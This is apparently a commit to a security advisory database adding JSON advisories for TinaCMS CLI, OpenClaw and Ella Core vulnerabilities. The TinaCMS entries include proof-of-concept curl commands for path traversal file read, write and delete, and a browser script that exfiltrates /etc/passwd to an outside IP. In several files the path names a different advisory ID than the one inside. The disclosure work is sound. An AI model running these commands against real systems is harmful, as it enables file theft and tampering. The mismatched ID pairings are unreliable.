Publish Advisories

GHSA-2f24-mg4x-534q
GHSA-5wcw-8jjv-m286
GHSA-73j8-2gch-69rq
GHSA-8pw3-9m7f-q734
GHSA-j478-p7vq-3347
GHSA-m48g-4wr2-j2h6
GHSA-m9pm-w3gv-c68f

Author: advisory-database[bot]

advisories/github-reviewed/2026/03/GHSA-2f24-mg4x-534q/GHSA-2f24-mg4x-534q.json

@@ -0,0 +1,61 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-2f24-mg4x-534q",
+  "modified": "2026-03-12T20:32:26Z",
+  "published": "2026-03-12T20:32:26Z",
+  "aliases": [
+    "CVE-2026-28793"
+  ],
+  "summary": "TinaCMS Vulnerable to Path Traversal Leading to Arbitrary File Read, Write and Delete",
+  "details": "## Summary\nThe TinaCMS CLI development server exposes media endpoints that are vulnerable to path traversal, allowing attackers to read and write arbitrary files on the filesystem outside the intended media directory.\n\n## Details\nWhen running tinacms dev, the CLI starts a local HTTP server (default port 4001) exposing endpoints such as:\n\n- /media/list/*\n\n- /media/upload/*\n\n- /media/*\n\nThese endpoints process user-controlled path segments using decodeURI() and path.join() without validating that the resolved path remains within the configured media directory.\n\n### Vulnerable code\n```\nbb.on('file', async (_name, file, _info) => {\n      const fullPath = decodeURI(req.url?.slice('/media/upload/'.length));\n      const saveTo = path.join(mediaFolder, ...fullPath.split('/'));\n// No validation that saveTo remains within mediaFolder\n      await fs.ensureDir(path.dirname(saveTo));\n      file.pipe(fs.createWriteStream(saveTo));\n    });\n```\n## PoC\n**Arbitrary File Read**\n```\ncurl \"http://localhost:4001/media/list/../../../etc/passwd\"\n```\n\nResult:\n\n<img width=\"889\" height=\"280\" alt=\"image(1)\" src=\"https://github.com/user-attachments/assets/a878a86a-71db-46ed-abda-3d4ddba692e0\" />\n\n\n**Arbitrary File Write**\n```\necho \"ATTACKER_CONTROLLED_CONTENT\" > /tmp/payload.txt\n\ncurl --path-as-is -X POST \\\n  \"http://localhost:4001/media/upload/../../../../../../tmp/pwned.txt\" \\\n  -F \"file=@/tmp/payload.txt\"\ncat /tmp/pwned.txt\n```\nResult:\n<img width=\"1320\" height=\"84\" alt=\"image(8)\" src=\"https://github.com/user-attachments/assets/8bd5046b-0456-474f-ab96-4e18a421997c\" />\n\n**Arbitrary File Delete**\n```\necho \"delete_me\" > /tmp/delete-test.txt\ncat /tmp/delete-test.txt # confirms file exists\ncurl --path-as-is -X DELETE \\\n\"http://localhost:4001/media/../../../../../../tmp/delete-test.txt\"\ncat /tmp/delete-test.txt # \"No such file or directory\"\n```\n<img width=\"1135\" height=\"105\" alt=\"image\" src=\"https://github.com/user-attachments/assets/64c24b83-0259-4a12-969d-98c8e8cc81ca\" />\n\n## Impact\n\nAn attacker who can reach the TinaCMS CLI dev server can:\n\n- Read arbitrary files (e.g. /etc/passwd, .env, SSH keys)\n\n- Write arbitrary files anywhere writable by the server process\n\n- Delete or overwrite files, depending on endpoint usage\n\n- Escalate to code execution in realistic development setups by overwriting executable scripts, configuration files, or watched source files\n\n## Attack Surface\n\nThe dev server binds to localhost by default, but exploitation is realistic in:\n\n- Cloud IDEs (Codespaces, Gitpod)\n\n- Docker or VM setups with port forwarding\n\n- Misconfigured dev environments binding to 0.0.0.0\n\n- Local malware or malicious dependencies\n\nThe server also enables permissive CORS, which may allow browser-based exploitation if the dev server is externally reachable, but CORS is not required for exploitation.\n\n## Recommended Fix\n\n- Resolve paths to absolute form\n\n- Enforce that resolved paths remain within the media root\n\n- Reject .. path segments and absolute paths\n\n- Consider authentication or token protection for dev server endpoints",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "@tinacms/cli"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "2.1.8"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/tinacms/tinacms/security/advisories/GHSA-2f24-mg4x-534q"
+    },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28793"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/tinacms/tinacms"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-22"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-12T20:32:26Z",
+    "nvd_published_at": "2026-03-12T17:16:50Z"
+  }
+}

advisories/github-reviewed/2026/03/GHSA-5wcw-8jjv-m286/GHSA-5wcw-8jjv-m286.json

@@ -0,0 +1,65 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-5wcw-8jjv-m286",
+  "modified": "2026-03-12T20:32:59Z",
+  "published": "2026-03-12T20:32:59Z",
+  "aliases": [
+    "CVE-2026-32302"
+  ],
+  "summary": "OpenClaw: Untrusted web origins can obtain authenticated operator.admin access in trusted-proxy mode",
+  "details": "## Summary\nIn affected versions of `openclaw`, browser-originated WebSocket connections could bypass origin validation when `gateway.auth.mode` was set to `trusted-proxy` and the request arrived with proxy headers. A page served from an untrusted origin could connect through a trusted reverse proxy, inherit proxy-authenticated identity, and establish a privileged operator session.\n\n## Impact\nThis issue affects deployments that expose the Gateway behind a trusted reverse proxy and rely on browser origin checks such as `controlUi.allowedOrigins` to restrict browser access. An attacker who can cause a victim browser to load a malicious page that can reach the proxy endpoint could establish a cross-site WebSocket connection and call privileged Gateway methods.\n\nIn verified impact, the attacker-origin page was able to request `operator.admin` and successfully call `config.get`, exposing sensitive configuration. Depending on the deployment, the same authenticated operator path could also permit other privileged reads or mutations available to operator-class callers.\n\n## Affected Packages and Versions\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.3.11`\n- Fixed in: `2026.3.11`\n\n## Technical Details\nThe WebSocket handshake logic treated proxy-delivered requests as exempt from the generic browser origin check whenever an `Origin` header was present alongside proxy headers. In `trusted-proxy` mode, that exemption allowed browser-originated connections to skip the normal origin-validation path even though they were still browser requests.\n\nBecause trusted-proxy authentication can produce a shared authenticated operator context, the affected path could retain requested operator scopes after the handshake. That made the browser origin check the missing boundary between an untrusted origin and an authenticated operator-class session.\n\n## Fix\nOpenClaw now enforces browser origin validation for any browser-originated WebSocket connection regardless of whether proxy headers are present. The fix shipped in `openclaw@2026.3.11`.\n\nFixed commit: `ebed3bbde1a72a1aaa9b87b63b91e7c04a50036b`\nRelease tag: `v2026.3.11`\n\n## Workarounds\nUpgrade to `2026.3.11` or later.\n\nIf you cannot upgrade immediately, avoid exposing browser-reachable Gateway WebSocket endpoints in `trusted-proxy` mode to untrusted origins, and ensure reverse-proxy/browser reachability is restricted to trusted origins only.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "openclaw"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "2026.3.11"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5wcw-8jjv-m286"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/openclaw/openclaw/commit/ebed3bbde1a72a1aaa9b87b63b91e7c04a50036b"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/openclaw/openclaw"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.11"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-346"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-12T20:32:59Z",
+    "nvd_published_at": null
+  }
+}

advisories/github-reviewed/2026/03/GHSA-73j8-2gch-69rq/GHSA-73j8-2gch-69rq.json

@@ -0,0 +1,74 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-8pw3-9m7f-q734",
+  "modified": "2026-03-12T20:32:09Z",
+  "published": "2026-03-12T20:32:09Z",
+  "aliases": [
+    "CVE-2026-28792"
+  ],
+  "summary": "TinaCMS CLI Dev Server Vulnerable to Cross-Origin File Exfiltration via CORS Misconfiguration + Path Traversal in TinaCMS",
+  "details": "## Summary\nThe TinaCMS CLI dev server combines a permissive CORS configuration (Access-Control-Allow-Origin: *) with the path traversal vulnerability (previously reported) to enable a browser-based drive-by attack. A remote attacker can enumerate the filesystem, write arbitrary files, and delete arbitrary files on developer's machines by simply tricking them into visiting a malicious website while tinacms dev is running.\n\n## Details\nThe TinaCMS dev server sets permissive CORS headers that allow **any origin** to make cross-origin requests:\n\n- packages/@tinacms/cli/src/server/server.ts:\n```\n  app.use(cors());\n```\n\n- packages/@tinacms/cli/src/next/vite/plugins.ts:\n```\n     server.middlewares.use(cors());\n```\nWhen combined with the path traversal vulnerability, this creates a complete attack chain.\n## Attack Scenario\n\n### Prerequisites\n1. Developer runs `tinacms dev` (default port 4001) \n2. Developer visits attacker's website while TinaCMS is running\n\n**No other conditions required** - the dev server doesn't need to be:\n- Exposed to the internet\n- Bound to 0.0.0.0\n- Accessible outside localhost\n\n### Attack Flow\n1. Developer starts TinaCMS: `tinacms dev`\n2. Developer browses the web (checking email, social media, etc.)\n3. Developer unknowingly visits attacker-controlled page (malicious ad, compromised site, etc.)\n4. Attacker's JavaScript exploits CORS + path traversal to read sensitive files\n5. Files are exfiltrated to attacker's server\n\n## PoC\n### Attacker's Malicious Website (evil.html):\n```\n<script>\nfetch('http://localhost:4001/../../../etc/passwd')\n  .then(r => r.text())\n  .then(data => {\n    // Exfil via GET\n    const img = new Image();\n    img.src = 'http://192.168.11.117:8080/exfil?data=' + encodeURIComponent(data);\n  });\n</script>\n```\n### Demonstration\n\n**Step 1:** Start TinaCMS dev server\n```bash\ntinacms dev\n# Server running on http://localhost:4001\n```\n\n**Step 2:** Host evil.html on attacker server\n```bash\npython3 -m http.server 8000\n```\n\n**Step 3:** Developer visits `http://attacker-server:8000/evil.html`\n\n**Result:** The browser makes cross-origin requests to localhost:4001.\nBecause cors() returns Access-Control-Allow-Origin: *, the browser\nallows the JavaScript to read the responses. Directory listings from\noutside the media directory are sent to the attacker's server.\n<img width=\"1900\" height=\"366\" alt=\"image\" src=\"https://github.com/user-attachments/assets/72fdd31d-dd93-4728-9a4b-4d7d66d33617\" />\n\n\n## Impact\n### Who is affected\nEvery developer running `tinacms dev` is vulnerable while the dev server is active. No special configuration is required the default setup is exploitable.\n\n### What an attacker achieves\nBy hosting a malicious webpage (or injecting script via a compromised ad network, XSS on a forum, etc.), the attacker can silently:\n\n1. **Enumerate the developer's filesystem** directory listings via `/media/list/` with path traversal reveal file and folder names\n   across the entire filesystem\n2. **Discover sensitive files** locate `.env`, `.git/config`,  SSH keys, cloud credentials, database configs\n3. **Write arbitrary files** via `/media/upload/` with path traversal, the attacker can overwrite project source files, inject backdoors, or modify build scripts\n4. **Delete arbitrary files** via `/media/` DELETE with path traversal",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "@tinacms/cli"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "2.1.8"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/tinacms/tinacms/security/advisories/GHSA-8pw3-9m7f-q734"
+    },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28792"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/tinacms/tinacms/pull/6450"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/tinacms/tinacms/commit/56d533e610a520ba66b3e58f3a0dc03487d5d5d7"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/tinacms/tinacms"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/tinacms/tinacms/releases/tag/%40tinacms%2Fcli%402.1.8"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-22",
+      "CWE-942"
+    ],
+    "severity": "CRITICAL",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-12T20:32:09Z",
+    "nvd_published_at": "2026-03-12T17:16:50Z"
+  }
+}

advisories/github-reviewed/2026/03/GHSA-8pw3-9m7f-q734/GHSA-8pw3-9m7f-q734.json

@@ -0,0 +1,61 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-j478-p7vq-3347",
+  "modified": "2026-03-12T20:33:28Z",
+  "published": "2026-03-12T20:33:28Z",
+  "aliases": [
+    "CVE-2026-32320"
+  ],
+  "summary": "Ella Core: AMF DoS via malformed PathSwitchRequest with empty NR security capability bitstrings",
+  "details": "## Summary\n\nElla Core panics when processing a PathSwitchRequest containing UE Security Capabilities with zero-length NR encryption or integrity protection algorithm bitstrings, resulting in a denial of service.\n\n## Impact\n\nAn attacker able to send crafted NGAP messages to Ella Core can crash the process, causing service disruption for all connected subscribers. No authentication is required.\n\n## Fix\n\nAdded length validation on NR algorithm bitstrings before accessing them in the PathSwitchRequest handler.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Go",
+        "name": "github.com/ellanetworks/core"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "1.5.1"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/ellanetworks/core/security/advisories/GHSA-j478-p7vq-3347"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/ellanetworks/core"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/ellanetworks/core/releases/tag/v1.5.1"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-125"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-12T20:33:28Z",
+    "nvd_published_at": null
+  }
+}

advisories/github-reviewed/2026/03/GHSA-j478-p7vq-3347/GHSA-j478-p7vq-3347.json

@@ -0,0 +1,62 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-m48g-4wr2-j2h6",
+  "modified": "2026-03-12T20:32:43Z",
+  "published": "2026-03-12T20:32:43Z",
+  "aliases": [
+    "CVE-2026-29066"
+  ],
+  "summary": "TinaCMS CLI has Arbitrary File Read via Disabled Vite Filesystem Restriction",
+  "details": "## Summary\nThe TinaCMS CLI dev server configures Vite with `server.fs.strict: false`, which disables Vite's built-in filesystem access restriction. This allows any unauthenticated attacker who can reach the dev server to read arbitrary files on the host system\n\n## Details\nWhen running `tinacms dev`, the CLI starts a Vite dev server configured in:\n`packages/@tinacms/cli/src/next/vite/index.ts`\n```\nserver: {\n  host: configManager.config?.build?.host ?? false,\n  ...\n  fs: {\n    strict: false, // Disables Vite's filesystem access restriction\n  },\n},\n```\nTinaCMS middleware only intercepts specific route prefixes (/media/*, /graphql, /altair, /searchIndex). Any request to a path outside these routes falls through to Vite's default static file handler, which will serve the file directly from the absolute path on the filesystem.\nAdditionally, the server enables permissive CORS (cors() with no origin restriction), which may further facilitate browser-based exploitation such as DNS rebinding attacks.\n\n## PoC\n\n**Prerequisites**: TinaCMS CLI dev server running (default port 4001).\n\n- Read system files directly:\n```\ncurl http://localhost:4001/etc/passwd\n```\n<img width=\"705\" height=\"332\" alt=\"image\" src=\"https://github.com/user-attachments/assets/6fd0e1c7-a549-40c8-bc81-af9c343f52a0\" />\n\n```\ncurl http://localhost:4001/etc/hostname\n```\n<img width=\"631\" height=\"41\" alt=\"image\" src=\"https://github.com/user-attachments/assets/bd103dc3-d4c3-4774-8007-b55de3fc2a9e\" />\nVite resolves and serves the absolute path directly from the filesystem.\n\n\n## Impact\nAny developer running tinacms dev in an environment where the dev server port is reachable by an attacker. This includes:\n\n- Cloud IDEs (GitHub Codespaces, Gitpod) where ports are automatically forwarded and publicly accessible\n\n- Docker or VM setups with port forwarding configured\n\n- Misconfigured environments binding to 0.0.0.0 via the build.host config option\n\n- Systems targeted via DNS rebinding attacks, leveraging the unrestricted CORS policy\n\n- Local environments with malicious dependencies running on the same machine\n\nAn attacker who can reach port 4001 can:\n\n- Read any file readable by the server process (/etc/passwd, /etc/shadow, SSH private keys)\n\n- Exfiltrate environment variables and secrets via /proc/self/environ\n\n- Access cloud credentials and API keys from configuration files",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "@tinacms/cli"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "2.1.8"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/tinacms/tinacms/security/advisories/GHSA-m48g-4wr2-j2h6"
+    },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29066"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/tinacms/tinacms"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-200",
+      "CWE-552"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-12T20:32:43Z",
+    "nvd_published_at": "2026-03-12T17:16:50Z"
+  }
+}